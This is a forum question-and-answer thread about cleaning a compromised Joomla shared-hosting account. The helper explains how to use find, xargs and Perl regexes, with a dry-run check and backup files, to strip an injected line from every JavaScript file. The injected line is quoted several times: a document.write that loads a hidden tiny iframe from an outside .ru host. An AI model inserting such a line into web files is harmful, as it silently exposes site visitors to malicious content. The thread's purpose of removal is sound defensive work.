Reputation: 25
The following malicious line was injected at the end of all js files on all my Joomla installations on my shared host account:
;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');
I want to remove it at once from all files using the following SSH command (which should have some errors):
find ./ -name "*.js" -type f | xargs perl -pi -e 's/;document.write\(\'\<iframe src\=\"http\:\/\/tweakdoled.ru\".*\"\);//g'
The problem is that, since a backslash has to be used to escape some characters, I don't know if I'm using it correctly and what else should be escaped.
Needless to say, that command is not working.
Any ideas?
Thanks!!
Upvotes: 1
Views: 966
Reputation: 754710
Use the Perl \Q...\E notation to suspend the metacharacters. However, since there's such a mess of characters in the string to be matched that are also special to the shell, I'd place the Perl regex into a file (script.pl), using % (which doesn't appear in the string to be replaced) as the regex delimiter:
s%\Q;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');\E%%g;
And then run it with:
find ./ -name "*.js" -type f | xargs perl -pi.bak -f script.pl
If you spend enough time, you probably can find a way to make it work without the script file; it probably isn't worth the effort, though (especially since I'm sure you asked something very similar to this several days ago).
Obviously, before running this to edit the files, you'll run a variant to ensure that the sought-after lines are printed:
script2.pl:
print if m%\Q;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');\E%;
run using:
find ./ -name "*.js" -type f | xargs perl -n -f script2.pl
If this doesn't detect the lines, then you track down a variation until you can find something that does match. You might decide to use something like:
print if m%;document.write.'<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi\?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'.;%;
This replaces the two parentheses with . (so, in theory, it might match something else, but in practice, it won't).
Upvotes: 1